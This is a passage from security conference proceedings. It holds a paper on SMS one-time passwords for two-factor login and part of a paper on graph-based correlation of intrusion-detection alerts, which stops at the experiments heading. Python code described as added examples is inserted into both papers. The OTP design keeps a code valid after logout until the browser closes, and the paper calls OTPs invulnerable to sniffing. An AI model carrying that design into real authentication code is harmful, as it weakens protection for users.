Abstract. Security will never go out of style. Most existing network applications authenticate users with a username/password system. Such systems, which use reusable passwords, are susceptible to attacks based on the theft of the password. To overcome this susceptibility in existing applications, there exists an authentication mechanism known as Two-Factor Authentication (T-FA). Two-factor authentication is a process used to authenticate or verify the identity of a person or other entity requesting access under security constraints. It is a system in which two different factors are used in conjunction to authenticate. Using two factors as opposed to one factor generally delivers a higher level of authentication assurance. Using a one-time password (OTP) as one factor makes it more difficult to gain unauthorized access to restricted resources, such as a computer account or a bank account. In this paper, we propose a new approach to implementing two-factor authentication with one of the factors being a one-time password generated using mobile phones.
1 Introduction

Authentication is the process of identifying a user to a system in order to access it. Access to a system normally depends on the identity of the user who requests access to a particular resource. Authentication is a major concern when building a secure system. The most commonly used solution today for authentication is the username and password. The more services a user has, the more username and password pairs the user needs to remember. It is well known that many people find it impossible to remember all their username and password combinations. Therefore they use the same combination for all their services and select passwords that are easily remembered. Intruders take advantage of this and act as a legitimate user [5][6]. Such reused combinations strongly reduce the security of an authentication mechanism. More secure authentication may be implemented with smart cards, an authentication server or even a PKI [11]. Authentication of a person in a system can be achieved by one of the following factors or by a combination of them:

1. Something you know (e.g., code numbers)
2. Something you are (e.g., biometrics)
3. Something you have (e.g., pass, ID card or token)
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 9–17, 2009. © Springer-Verlag Berlin Heidelberg 2009
Section 2 explains the method of two-factor authentication with its various authentication types, and Section 3 overviews the one-time password generation methodology; using these two technologies we provide a solution for implementing a secure system. Section 4 describes the related technology and its benefits. Section 5 describes related work and its disadvantages. Section 6 presents our work and its advantages over the work described in Section 5. Finally, Sections 7 and 8 give the conclusion and future work, and the references, respectively.
2 T-FA (Two-Factor Authentication)

Two-factor authentication (T-FA) is a system in which two different factors are used to authenticate a user. It adds security to the system because the user must provide two factors of authentication, not just a password or passcode. Two-factor authentication combines 'something that you know' (password, PIN) with 'something that you have' (hardware token, mobile phone) or 'something that you are' (biometric) to identify the person as the one he claims to be. Two-factor authentication means leveraging at least two of the authentication methods mentioned above. Using two factors as opposed to one factor generally delivers a higher level of authentication assurance. In order to gain access to specific resources, an unauthorized user or intruder needs access to 'two factors': the secret code (password, PIN) and the authentication device. T-FA could tremendously reduce the possibility of online identity theft [8], because the victim's secret password would no longer be sufficient for an intruder to access their information. However, T-FA is still vulnerable to trojan and man-in-the-middle attacks [1].

2.1 T-FA Implementations

There are a number of methods available to practically implement T-FA. Where a combination of different implementations is used, e.g., an ATM card and a PIN, the term two-factor authentication applies.

2.2 Authentication Types

Tokens. A security token (or hardware token) is a small device that the user carries to authorize access to a network resource.

Magnetic Cards. Magnetic cards, e.g., credit cards, debit cards, ATM cards, etc., provide a possible two-factor authentication.

Mobile Phones. A mobile phone can be used as a token device using SMS messaging or an interactive telephone call.
Biometrics. Biometrics such as face recognition, voice authentication and fingerprinting. There are further authentication types that cannot be discussed here and are beyond the scope of this paper.
3 OTP (One Time Password)

Traditional static passwords can easily be obtained by an unauthorized intruder after a number of attempts. An authentication method that overcomes this issue, while preserving the security of the system, is to generate a one-time password for each login [2][3][4]. One-time passwords provide a secure and easy-to-use authentication solution, and there are many implementations of OTP in existence today [7][8][9][10][11]:

1. A mathematical algorithm is used to generate a new password based on the previous one.
2. A time-synchronization-based method between the authentication server and the client providing the password.
3. A mathematical algorithm is used, but the new password is based on a challenge (e.g., a random number chosen by the authentication server) and a counter instead of being based on the previous password.
4. A list of passwords printed on paper.
5. Portable electronic devices (e.g., mobile phones).
One-time passwords solve many of the issues with static passwords. They are generated by a hardware token, a computer, a mobile phone or any other device using challenge-response and many other methods, and therefore appear totally random. In addition, as the name suggests, they are used only once. This property makes them invulnerable to attacks based on password sniffing and replay. By changing the password every time, OTP solutions introduce aliveness, which is an important concept for detecting whether an unauthorized intruder is trying to use old information.
4 Related Technology

Single Sign On (SSO) is the ability for a user to log in once and gain access to multiple software systems that are related to each other but independent, using just one user ID and password.

4.1 Benefits

1. Reducing password fatigue from different user name and password combinations [12].
2. Reducing time spent re-entering passwords for the same identity [13].
3. Supporting authentication such as Windows credentials (i.e., username/password).
4. Providing security at all levels of access to the systems without re-entering the user credentials.
Since static passwords are the least secure mechanism for authentication, single sign on has now become known as reduced sign on (RSO), because more than one type of authentication mechanism is used in enterprises. For example, in an enterprise using SSO software, the user logs in to the system with their ID and password. This gives single sign on authentication to access low-risk information and multiple applications such as the information portal. However, when the user tries to access higher-risk applications and information, such as a payroll system, the single sign on software requires them to use a stronger form of authentication. This may include digital certificates, security tokens, smart cards, biometrics or combinations of them.
5 Related Work

There has been much research on one-time password mechanisms, and many mechanisms are also in practical use as commercial products. One-time password mechanisms that generate the password can be classified into time-based and MIDlet-based authentication.

5.1 Time Factor Based

The Free Auth Project has developed a MIDlet for their OTP solution [14]. Their OTP generation depends on a time factor and requires client and server synchronization. Time synchronization is not always possible, and hence not an easy task, and the solution is vulnerable if the synchronization fails.

5.2 Java MIDlet

There is another solution in which a user must have access to a computer connected to the Internet and must possess a mobile phone with a SIM card. A Java MIDlet installed on a Java-enabled mobile phone transforms the phone into a secure OTP token that can be used to log in to any service on the Internet. If the computer and mobile phone are equipped with Bluetooth, higher usability can be obtained. Through the browser application on the computer, the user can access web services provided by service providers. The service provider (SP) is connected to an Authentication Server (AS), which in turn handles the authentication on behalf of the SP. The AS is connected to the GSM network, which enables it to communicate with the user's mobile phone. The authenticator on the AS communicates with the client and relays messages to the AAA server, which handles the authentication [15]. There are many limitations in the practical implementation of this solution. Firstly, the MIDlet must already be installed on the phone by the service provider. Secondly, the current diverse range of user interfaces on different mobile phone types poses a significant challenge for support staff: they need to be fully trained on all supported phone types in order to guide end users in using and navigating the Java MIDlet application installed on the phone.
6 The Proposed System

Traditional solutions require a user to carry a dedicated hardware token for each application. Mobile phones eliminate the need for individual or enterprise users to carry additional hardware tokens. In addition to two-factor authentication, the mobile phone also delivers two-way authentication. In the traditional OTP authentication mechanism [7], there is only one direction: the user authenticates their identity to the application provider. One-way authentication cannot prevent phishing or spoofing attacks, in which a fake website attempts to steal users' identities by presenting itself as a legitimate commercial website. Recent studies on authentication have shown that the isolated use of a single one of these solutions does not guarantee a high security level. However, it has been shown that a combination of these techniques provides stronger authentication, since it involves the use of two separate authentication mechanisms.

6.1 Solution Overview

In our work we consider the disadvantages of the solutions described in Section 5 and hence designed a well-structured system with two-tier authentication. Our solution is simply to include OTP as one of the two factors in T-FA, with some modifications on the application side, to achieve the desired degree of authentication for accessing a secure system. In our proposed solution, the prerequisites are as follows:

1. A computer with internet access.
2. A mobile phone with a working SIM card.
3. An application with two consecutive intermediate screens of authentication.
We also assume that a user is already registered with an application provider and has been given a static userID and password to access the initial page of the application, i.e., the traditional login screen where the username and password are entered. To get actual access to the application, the user needs one more authentication on the second, intermediate screen. That is where OTP plays its role in the T-FA mechanism we propose.

6.2 One Time Password Generation

We use a new system of OTP generation, as shown in Fig. 1. We describe our new OTP system in the following steps:

1. A user logs in to the system with the issued username and password.
2. The application sends a notification to the host server to generate a random number (the OTP), which may be composed of 6 - 8 digits.
3. The application sends this generated random number as an SMS text message to the user's mobile phone through the internet (mobile service provider).
4. This OTP is valid per user session, i.e., until the web browser is closed or the session expires. Whenever a user logs out of the application, the given OTP remains valid as long as that browser window is open. The session expires only after the browser window is closed or a specified period of time has elapsed.
5. Every time a user opens a new browser window and logs in to the system, a new request is made and a new OTP is generated.
6.3 Working of the System

First, a user logs in to the initial screen of the application with the static userID and password allotted by the application provider at registration time. After successfully logging in to this screen, the user is presented with a second screen that has one more password field. Simultaneously, the underlying application sends a request to the host server and an OTP is generated as described in Section 6.2. The user must enter this number in the intermediate screen's password field to get actual access to the application. If the sending application does not receive the user's OTP passcode within a specified period of time, it assumes some failure in sending the passcode, so it generates a new passcode and sends it to the user's mobile again, as depicted in Flow diagram 1.

[Fig. 1. One Time Password Generation: diagram residue; the labelled components are OTP, Service Provider, Web Browser, Network Interface, Internet, Computer and Web server]

[Flow diagram 1: diagram residue; the labelled elements are User, First Screen, Intermediate Screen, App. data, Web Server, Mobile and the decision "Pass entered in time?" with Yes/No branches]

6.4 Comparison and Advantages

In our solution it is evident that we overcome all the disadvantages of the previous solutions, as follows:

1. There is no need for time factor synchronization in our system. Hence our solution does not fail on that account.
2. In our solution we do not need any special MIDlet installed on the device by the service provider.
3. There is also no need for fully trained support staff to guide end users in using and navigating a Java MIDlet application installed on the phone.
4. We just use existing SMS text messages, without the need to add or support additional software on the phone.
5. A user does not need to do anything at all. It is the application provider who has to modify the application so as to implement the proposed authentication system.
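The two-screen login of Sections 6.2 and 6.3, as an added example that is not the paper's code: a minimal server-side model in Python that issues a 6-digit OTP after the static password check, delivers it through a pluggable SMS sender, keeps it valid for the browser session (including across logout, as the paper specifies) and reissues it when no passcode arrives within the time limit. The user record, the phone number, the 120-second resend window and the attempt limit are constructed assumptions not taken from the paper.

```python
import hashlib
import hmac
import secrets
import time

OTP_DIGITS = 6            # the paper allows 6 - 8 digits
RESEND_SECONDS = 120      # assumed "specified period of time" before resending
MAX_ATTEMPTS = 5          # assumed limit on wrong OTP entries (not in the paper)


def make_user_record(password: str, phone: str) -> dict:
    """Constructed registration record: salted PBKDF2 hash of the static password."""
    salt = secrets.token_bytes(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return {"salt": salt, "pw_hash": pw_hash, "phone": phone}


def _password_ok(password: str, rec: dict) -> bool:
    cand = hashlib.pbkdf2_hmac("sha256", password.encode(), rec["salt"], 100_000)
    return hmac.compare_digest(cand, rec["pw_hash"])


def generate_otp(digits: int = OTP_DIGITS) -> str:
    """Random numeric OTP from the OS CSPRNG; leading zeros are kept."""
    if not 6 <= digits <= 8:
        raise ValueError("the paper specifies a 6 - 8 digit OTP")
    return str(secrets.randbelow(10 ** digits)).zfill(digits)


class OtpLoginServer:
    """Application side of the proposed scheme. send_sms(phone, text) stands for
    the mobile-provider gateway; clock() lets tests control time."""

    def __init__(self, users, send_sms, clock=time.time,
                 digits=OTP_DIGITS, resend_after=RESEND_SECONDS):
        self._users = users
        self._send_sms = send_sms
        self._clock = clock
        self._digits = digits
        self._resend_after = resend_after
        self._sessions = {}   # browser-session id -> state

    def first_screen(self, username: str, password: str):
        """Step 1: static userID/password. Returns a session id, or None."""
        rec = self._users.get(username)
        if rec is None or not _password_ok(password, rec):
            return None
        sid = secrets.token_urlsafe(16)
        self._sessions[sid] = {"phone": rec["phone"], "verified": False}
        self._issue_otp(sid)          # steps 2 and 3: generate and SMS the OTP
        return sid

    def _issue_otp(self, sid: str) -> None:
        s = self._sessions[sid]
        s["otp"] = generate_otp(self._digits)
        s["issued"] = self._clock()
        s["attempts"] = 0
        self._send_sms(s["phone"], "Your one-time password is " + s["otp"])

    def intermediate_screen(self, sid: str, entered: str) -> str:
        """Second screen (step 4). Returns 'granted', 'resent' or 'denied'."""
        s = self._sessions.get(sid)
        if s is None:
            return "denied"
        if self._clock() - s["issued"] > self._resend_after:
            # Flow diagram 1: no passcode in time -> assume delivery failed, resend
            self._issue_otp(sid)
            return "resent"
        s["attempts"] += 1
        if hmac.compare_digest(s["otp"], entered):   # constant-time comparison
            s["verified"] = True
            return "granted"
        if s["attempts"] >= MAX_ATTEMPTS:
            del self._sessions[sid]
        return "denied"

    def is_authenticated(self, sid: str) -> bool:
        s = self._sessions.get(sid)
        return bool(s and s["verified"])

    def logout(self, sid: str) -> None:
        """Per the paper, logging out keeps the OTP valid while the window stays open."""
        if sid in self._sessions:
            self._sessions[sid]["verified"] = False

    def close_browser(self, sid: str) -> None:
        """Closing the browser window ends the session; a new login gets a new OTP."""
        self._sessions.pop(sid, None)
```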
[Fig. 2. Our System Architecture: diagram residue; the labelled components are Login Screen, Intermediate Screen, Application Data and Application Server]
7 Conclusion

This paper studies two-factor authentication in detail and makes improvements accordingly. It also presents an OTP authentication system using mobile phones. TFA/OTP is a combined authentication system that aims to improve the security of web applications while maintaining security and usability through the use of a simple mobile phone. We also presented a new concept in web application design with the integration of one more intermediate screen. The proposed solution is easy to integrate into new or existing web applications. However, since it authenticates the user and executes password authentication one more time, it has the shortcoming that authentication takes somewhat longer. Therefore the proposed system is considered suitable for fields where security is emphasized over response time, such as internet banking, electronic payment, medical systems and eCommerce. Currently we also have the issue of delayed SMS messages (OTP) in our system during peak hours. In our future work we will continue researching methods for reducing authentication time and the SMS delay.
References

1. Schneier, B.: The Failure of Two-Factor Authentication (March 2005), http://www.schneier.com/blog/archives/2005/03/the_failure_of.html
2. Haller, N.: The S/KEY One-Time Password System. In: Proceedings of the Symposium on Network and Distributed System Security (1994)
3. Rubin, A.D.: Independent One-Time Passwords. In: Proc. 5th UNIX Security Symposium. USENIX Association (June 1995)
4. Haller, N., Metz, C., Nesser, P., Straw, M.: A One-Time Password System. RFC 2289, IETF (1998)
5. Tittel, E., Chapple, M., Stewart, J.M. (eds.): CISSP: Certified Information Systems Security Professional. Sybex (2003)
6. Oppliger, R.: Security Technologies for the World Wide Web. Artech House (2000)
7. Lamport, L.: Password Authentication with Insecure Communication. Communications of the ACM 24(11), 770–772 (1981)
8. Cheswick, W.R., Bellovin, S.M., Rubin, A.D.: Firewalls and Internet Security: Repelling the Wily Hacker. Addison-Wesley, Reading (2003)
9. http://www.cryptocard.com/
10. http://www.securid.com
11. Kim, H.-C., Lee, H.-W., Lee, K.-S., Jun, M.-S.: Networked Computing and Advanced Information Management. In: Fourth International Conference on NCM 2008, September 2-4, vol. 1, pp. 18–24 (2008)
12. White Papers on Simple and Secure Enterprise Single Sign-On, http://secude.com/htm/806/en/White_Paper_Section%3A_Single_Sign-On.htm
13. How to Improve Business Results by Reducing IT Help Desk Costs through Secure Single Sign-On, http://secude.com/htm/811/en/White_Paper%3A_Enterprise_SSO.htm
14. FreeAuthProject: The FreeAuth Project, http://www.freeauth.org/site (cited March 2007)
15. Hallsteinsen, S.: Using the mobile phone as a security token for unified authentication. Department of Telematics, Norwegian University of Science and.., http://ieeexplore.ieee.org/
16. Whitman, M.E.: In defense of the realm: understanding the threats to information security. International Journal of Information Management 24(1), 43–57 (2004)
17. Lee, N.-Y., Chen, J.-C.: Improvement of One-Time Password Authentication Scheme Using Smart Cards. Oxford Journals E88-B(9), 3765–3767
18. Archer Harris, J.: OPA: A One-Time Password System. In: International Conference on Parallel Processing Workshops (ICPPW 2002), p. 25 (2002)
19. Zhu, D.: Security control in inter-bank fund transfer. Journal of Electronic Commerce Research 3(1) (2002)
Correlating Alerts into Compressed Graphs Using an Attribute-Based Method and Time Windows

Seyed Hossein Ahmadinejad and Saeed Jalili
Faculty of Electrical and Computer Engineering, Tarbiat Modares University
{ahmadinejad,sjalili}@modares.ac.ir
Abstract. Intrusion detection systems usually report a huge number of alerts every day. Since the abstraction level of these alerts is very low, analyzing them and discovering the attack strategies behind them is not easy, or even possible. Alert correlation methods have been developed to decrease the number of alerts and provide a high-level abstraction of them. In this paper, we propose a method to estimate correlation probabilities between alerts. The concept of time windows is applied in a particular way to decrease complexity and increase accuracy at the same time. Besides, we suggest a compression method that further reduces the number of comparisons needed for correlating alerts and makes the output of the method more intelligible. Our experiments reveal that while the proposed correlation method performs accurately, its complexity drops noticeably compared to previous methods.
1 Introduction

Security has always been one of the great concerns about networks. An intrusion detection system (IDS) is one of the techniques developed to establish security in networks. However, alerts raised by IDSs are not meaningful enough for the administrator to analyze them directly. Furthermore, IDSs generate too many alerts. Clearly, finding the attack strategy from primitive alerts is impossible for a human. Therefore, a higher-level management layer is required to reduce the number of alerts and provide a brief, high-level view of the security state of the protected network. Alert correlation methods have been proposed to address this challenge, and quite a number of techniques from various approaches have been suggested. In this paper, our method is based on the fact that there are similarities between the attributes of correlated alerts. We organize correlated alerts in different groups. When a new alert arrives, we first find which group it belongs to and then which alerts in that group it is correlated with. Each group is divided into time windows. To find the host group of the new alert, we select some alerts from each group and compare them with the new alert. By using time windows, we avoid selecting all previous alerts for comparison, because that is not practical in the real world. To compare two alerts, a similarity vector is extracted from their attributes, such as IP, port, etc., and from a correlation knowledge base. A classifier estimates their correlation probability from their similarity vector. After finding the host group, those alerts whose correlation probability with the new alert exceeds a predefined threshold are correlated with the new alert. Our main contribution in this paper is a method to compress groups of correlated alerts by merging similar alerts. The remainder of this paper is organized as follows: the next section presents the main principles and steps of the proposed method. Section 3 illustrates the experiments we have done to show the abilities of our method. Section 4 discusses related work and the advantages of our method over it. The last section concludes this paper and points out some future research directions.

This project has been supported in part by the Iran Telecommunication Research Center (ITRC) under grant no. T/500/20120.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 18–25, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Alert Correlation Method

2.1 Correlation Knowledge Base

Alerts raised by an IDS have a type attribute. We use a matrix structure exactly the same as the one defined in our previous work [1] to store the correlation strength between any two types of alerts. This matrix is incrementally updated during the alert correlation process. In effect, this matrix encodes knowledge about the correlation between all pairs of alert types. The most important information in the knowledge base is the correlation strength between alert types, denoted $CS(a_i, a_j)$ and computed as follows:

$$CS(a_i, a_j) = \sum_{k=1}^{n} p_{i,j}(k) \qquad (1)$$

where $p_{i,j}(k)$ is the probability of the $k$-th correlation between $a_i$ and $a_j$ (the types of the $i$-th and $j$-th alerts), and $n$ is the number of times these two types of alerts have been correlated.

2.2 Similarity Vectors
In order to estimate the correlation probability between two alerts, a similarity vector is created from their attributes.

Feature 1: Source IPs Similarity. The similarity between two IPs is computed by counting the number of high-order bits of the first IP that are the same as in the other IP. The value of this feature is between 0 and 1.

Feature 2: Destination IPs Similarity. Computed like Feature 1.

Feature 3: Destination Ports Similarity. If the destination port numbers of the two alerts are the same, this feature is 1; otherwise it is 0.

Feature 4: Alerts IP Chain. The value of this feature is 1 if the source IP address of the new alert matches the destination IP address of the previous alert.
Feature 5: Alerts Type Chain. The likelihood that an alert type will be followed by another alert type. This feature is computed according to the following equation:

$$ATC(a_i, a_j) = CS(a_i, a_j) \Big/ \sum_{k=1}^{n} CS(a_k, a_j) \qquad (2)$$
Feature 6: Correlation Frequency. The number of times two alert types were correlated, divided by the number of times these two types were compared.
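The six features of Section 2.2 together with the knowledge-base quantities they depend on, equations (1) and (2), as an added Python example that is not the paper's code. Alert records are plain dicts, the knowledge base is keyed by (type_i, type_j) pairs, and the alert types, addresses and probabilities in the demo are constructed sample values.

```python
import ipaddress
from collections import defaultdict


class CorrelationKB:
    """Correlation knowledge base: per pair of alert types (a_i, a_j) it keeps the
    running sum CS(a_i, a_j) of equation (1) and the counters behind Feature 6."""

    def __init__(self):
        self.cs = defaultdict(float)        # (type_i, type_j) -> CS(a_i, a_j)
        self.correlated = defaultdict(int)  # times the pair was correlated
        self.compared = defaultdict(int)    # times the pair was compared

    def record_comparison(self, type_i, type_j):
        self.compared[(type_i, type_j)] += 1

    def record_correlation(self, type_i, type_j, probability):
        """Equation (1): CS is the sum of the correlation probabilities p_{i,j}(k)
        over the n correlations seen so far, so one update adds the k-th term."""
        self.cs[(type_i, type_j)] += probability
        self.correlated[(type_i, type_j)] += 1

    def alert_type_chain(self, type_i, type_j):
        """Equation (2): CS(a_i, a_j) / sum_k CS(a_k, a_j), i.e. how strongly a_j
        was preceded by a_i relative to every type that preceded a_j."""
        total = sum(v for (_, succ), v in self.cs.items() if succ == type_j)
        return self.cs[(type_i, type_j)] / total if total else 0.0

    def correlation_frequency(self, type_i, type_j):
        """Feature 6: correlated count divided by compared count."""
        n = self.compared[(type_i, type_j)]
        return self.correlated[(type_i, type_j)] / n if n else 0.0


def ip_similarity(ip_a, ip_b):
    """Features 1 and 2: fraction of high-order bits shared by two IPv4 addresses.
    XOR leaves zeros where the bits agree, so the length of the common prefix is
    32 minus the bit length of the XOR."""
    a = int(ipaddress.IPv4Address(ip_a))
    b = int(ipaddress.IPv4Address(ip_b))
    return (32 - (a ^ b).bit_length()) / 32


def similarity_vector(prev, new, kb):
    """Build the six-element vector the classifier consumes, for a previous alert
    `prev` and a newly arrived alert `new` (dicts with type/src_ip/dst_ip/dst_port)."""
    return [
        ip_similarity(prev["src_ip"], new["src_ip"]),          # Feature 1
        ip_similarity(prev["dst_ip"], new["dst_ip"]),          # Feature 2
        1.0 if prev["dst_port"] == new["dst_port"] else 0.0,   # Feature 3
        1.0 if new["src_ip"] == prev["dst_ip"] else 0.0,       # Feature 4
        kb.alert_type_chain(prev["type"], new["type"]),        # Feature 5
        kb.correlation_frequency(prev["type"], new["type"]),   # Feature 6
    ]


def demo():
    """Constructed history: Sadmind_Ping was compared with Admind four times and
    correlated twice; Rsh was correlated with Admind once. Then a new Admind
    alert whose source is the destination of the earlier Sadmind_Ping is scored."""
    kb = CorrelationKB()
    for _ in range(4):
        kb.record_comparison("Sadmind_Ping", "Admind")
    kb.record_correlation("Sadmind_Ping", "Admind", 0.8)
    kb.record_correlation("Sadmind_Ping", "Admind", 0.6)
    kb.record_correlation("Rsh", "Admind", 0.6)
    prev = {"type": "Sadmind_Ping", "src_ip": "10.1.1.5", "dst_ip": "10.2.2.7", "dst_port": 111}
    new = {"type": "Admind", "src_ip": "10.2.2.7", "dst_ip": "10.3.3.9", "dst_port": 111}
    return similarity_vector(prev, new, kb)


if __name__ == "__main__":
    print(demo())
```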
2.3 Correlation Probability Estimation

In order to estimate the correlation probability between two alerts from their similarity vector, we use a classification method. To select the proper classifier, many classification methods were tested for accuracy. LogitBoost [2], a boosting method, with DecisionStump [2] as its base learner gave the best result. Due to space limitations, it is not possible to show the evaluation results in this paper.

2.4 Correlating Alerts
First we define a few terms that will be used in this paper:

– Alert: a primitive message raised by an IDS.
– Alert Set: a set of several alerts with the same alert type located in the same time window (we use alert sets instead of alerts because we need a structure that can contain more than one alert).
– Front alert: the last alert inserted into an alert set.
– Hyper Alert Graph (Hyper Alert): a graph of correlated alerts whose nodes are alert sets and whose edges depict correlation between nodes.

In the first step, the classifier must be trained. We created a small training set based on the principles of correlation between alert attributes. We put alerts into alert sets to support compression, because some alerts might be merged in the compression step. Hyper alerts contain alert sets, and each alert set contains one or more alerts. Each group of correlated alerts is placed in a different hyper alert. When a new alert arrives, a new alert set containing the new alert is created. The hyper alert whose alerts have the highest average correlation with the new alert should be selected as the host hyper alert. To find the host hyper alert, the new alert is compared with previous alerts spread over the hyper alerts. Since comparing the new alert with all previous alerts in all hyper alerts is time consuming, and may even be impossible due to the large number of alerts, only a part of the alerts in each hyper alert is selected for comparison. For the purpose of selecting some delegate alerts from hyper alerts, we consider time windows over them. However, unlike methods that use time windows to avoid investigating the correlation of old alerts with the new one, we only want to focus more on newer alerts, not to omit old alerts. This greater attention to recent alerts decreases the probability of being affected by alerts that are too old. To do so, a few alerts, not all of them, are selected from the time windows using a new technique. If there
are $n$ time windows in total in a hyper alert, we select $\lambda$ alerts from time window $w_i$ (the $i$-th time window in the hyper alert) according to the following equations:

$$\beta = i \times \frac{\text{number of alerts in } w_i}{n} \qquad (3)$$

$$\lambda = \alpha \cdot \beta \qquad (4)$$

where $\beta$ is a number less than the number of alerts in $w_i$, and $\alpha$ is a constant between 0 and 1 (set by an expert) that lets us select even fewer alerts. We aim to pick more alerts from those time windows that are closer to the current time or contain a considerable number of alerts. As stated above, the nodes of hyper alerts are alert sets, not alerts. So, sample alert sets are picked using (4) for all time windows of a hyper alert. The new alert is compared with the front alert of each selected alert set, because there might be more than one alert in the selected alert set. To compare them with the new alert, similarity vectors are constructed and fed into the classifier. The output of the classifier for a similarity vector, the correlation probability, is multiplied by the number of alerts merged in the alert set. All correlation probabilities are added together and divided by the number of comparisons. The result, called CorrelationFactor, is the average correlation probability between the new alert and a hyper alert. CorrelationFactor is computed for all hyper alerts. During this process, the maximum of the estimated correlation probabilities is stored for every hyper alert. Before describing the rest of the method, it is necessary to introduce two thresholds:

Correlation Threshold: a threshold used to find the host hyper alert for the new alert.
Correlation Sensitivity: a threshold used to find those alerts in the host hyper alert that are correlated with the new alert.

Once CorrelationFactor has been computed for all hyper alerts, the hyper alert with the maximum value of CorrelationFactor is selected. If the maximum correlation probability in the selected hyper alert is greater than the Correlation Threshold, the selected hyper alert becomes the host of the new alert set. Otherwise, a new hyper alert is created and the new alert set is placed there.
In the former case, the new alert set is compared with all of the alert sets in the host hyper alert to determine which of them are correlated with it. This comparison step is done exactly like the previous step. If $p_i$ is the correlation probability between the new alert $al_{new}$ and an alert set $as_i$ in the host hyper alert, and $p_{max}$ is the maximum correlation probability, then $al_{new}$ is correlated with $as_i$ if the following condition evaluates to true:

$$p_{max} - p_i < \text{Correlation Sensitivity} \qquad (5)$$
After correlating two alert sets, their corresponding cell in the correlation knowledge base is updated. Eventually, each group of correlated alerts gathers in a different hyper alert. Furthermore, a hyper alert compression method is used during the correlation process, not only to further reduce the number of comparisons but also to suppress excessive detail. Although it might have a small effect on the accuracy of the system, this degradation can be controlled by means of a threshold that will be explained in the next section. The frequency of the compression process is specified by a security expert.
3 Compression Method
As new alerts arrive, the size of the hyper alerts grows, and so does the number of comparisons. On the other hand, there are some nodes (alert sets) that are very similar in their relations with other nodes, and we can merge some of them to boost performance, albeit with a negligible decrease in accuracy. First, we define some variables and functions for a node $as_i$ (alert set) in a hyper alert:

$as_i.parent$: the set of nodes (alert sets) connected to $as_i$.
$as_i.children$: the set of nodes (alert sets) to which $as_i$ is connected.
$subtract(set_1, set_2)$: $set_1$ with those nodes that exist in $set_2$ removed.
$size(set_1)$: the number of elements (alert sets) in $set_1$.

Two alert sets $as_i$ and $as_j$ merge together in the compression phase if all of the following statements evaluate to true:

– $as_i$ and $as_j$ are in the same time window.
– $as_i$ and $as_j$ have the same alert type.
– $1 - \dfrac{size(subtract(as_i.children, as_j.children))}{size(as_i.children)} > Strictness$
– $1 - \dfrac{size(subtract(as_j.children, as_i.children))}{size(as_j.children)} > Strictness$
– $1 - \dfrac{size(subtract(as_i.parent, as_j.parent))}{size(as_i.parent)} > Strictness$
– $1 - \dfrac{size(subtract(as_j.parent, as_i.parent))}{size(as_j.parent)} > Strictness$

To merge two alert sets, a new alert set is created with the union of the alerts contained in the two alert sets and the union of their relations with other alert sets. For repeated edges, only one is stored, but the number of repetitions is also held to show its strength. Strictness is a threshold between 0 and 1 defined by the administrator to control the trade-off between accuracy and performance. The higher the Strictness, the less the hyper alert is compressed. The merging process continues as long as there is a pair of alert sets that can be merged according to the above conditions.
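The merge rule of Section 3, as an added Python example that is not the paper's code: a hyper alert graph whose nodes are alert sets, the four overlap conditions checked against Strictness, and the merge that unions alerts and edges while keeping a repetition count per edge. The sample graph and its alert names are constructed; treating an empty parent or child set as fully overlapping is an assumption the paper does not spell out.

```python
from dataclasses import dataclass, field


@dataclass
class AlertSet:
    """A node of a hyper alert graph: one or more alerts of one type in one window."""
    sid: int
    alert_type: str
    window: int
    alerts: list = field(default_factory=list)
    parents: set = field(default_factory=set)    # nodes connected to this one
    children: set = field(default_factory=set)   # nodes this one is connected to


class HyperAlert:
    def __init__(self):
        self.nodes = {}    # sid -> AlertSet
        self.edges = {}    # (src, dst) -> repetition count (edge strength)

    def add_node(self, node):
        self.nodes[node.sid] = node

    def add_edge(self, src, dst):
        self.edges[(src, dst)] = self.edges.get((src, dst), 0) + 1
        self.rebuild_links()

    def rebuild_links(self):
        """Recompute every node's parent/child sets from the edge table."""
        for node in self.nodes.values():
            node.parents.clear()
            node.children.clear()
        for src, dst in self.edges:
            self.nodes[src].children.add(dst)
            self.nodes[dst].parents.add(src)


def overlap(own, other):
    """1 - size(subtract(own, other)) / size(own). An empty `own` is treated as
    fully overlapping (assumption: the paper leaves 0/0 undefined)."""
    if not own:
        return 1.0
    return 1.0 - len(own - other) / len(own)


def can_merge(a, b, strictness):
    """The conditions of Section 3: same window, same type, and all four
    overlap ratios strictly greater than Strictness."""
    if a.sid == b.sid or a.window != b.window or a.alert_type != b.alert_type:
        return False
    ratios = (overlap(a.children, b.children), overlap(b.children, a.children),
              overlap(a.parents, b.parents), overlap(b.parents, a.parents))
    return all(r > strictness for r in ratios)


def merge(graph, keep, drop):
    """Replace nodes keep/drop by one node holding the union of their alerts and
    edges; a repeated edge is stored once with its repetition counts summed."""
    merged = AlertSet(keep.sid, keep.alert_type, keep.window, keep.alerts + drop.alerts)
    del graph.nodes[drop.sid]
    graph.nodes[keep.sid] = merged
    new_edges = {}
    for (src, dst), count in graph.edges.items():
        src = keep.sid if src == drop.sid else src
        dst = keep.sid if dst == drop.sid else dst
        if src == dst:      # an edge between the two merged nodes would be a self-loop
            continue
        new_edges[(src, dst)] = new_edges.get((src, dst), 0) + count
    graph.edges = new_edges
    graph.rebuild_links()
    return merged


def compress(graph, strictness):
    """Keep merging while some pair satisfies can_merge; returns the number of merges."""
    merges = 0
    while True:
        ids = sorted(graph.nodes)
        pair = next(((x, y) for i, x in enumerate(ids) for y in ids[i + 1:]
                     if can_merge(graph.nodes[x], graph.nodes[y], strictness)), None)
        if pair is None:
            return merges
        merge(graph, graph.nodes[pair[0]], graph.nodes[pair[1]])
        merges += 1


def build_sample_graph():
    """Constructed hyper alert: one Sadmind_Ping feeding three Admind alert sets,
    two of which lead to the same Sadmind_Amslverify_Overflow; the third has no child."""
    g = HyperAlert()
    g.add_node(AlertSet(1, "Sadmind_Ping", 0, ["a1"]))
    g.add_node(AlertSet(2, "Admind", 1, ["a2"]))
    g.add_node(AlertSet(3, "Admind", 1, ["a3"]))
    g.add_node(AlertSet(4, "Sadmind_Amslverify_Overflow", 2, ["a4"]))
    g.add_node(AlertSet(5, "Admind", 1, ["a5"]))
    for src, dst in [(1, 2), (1, 3), (2, 4), (3, 4), (1, 5)]:
        g.add_edge(src, dst)
    return g
```

With Strictness 0.5 the two Admind nodes that share both parent and child merge into one node with edge counts of 2, while the childless Admind node stays separate; with Strictness 1.0 nothing merges.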
4 Experimental Results

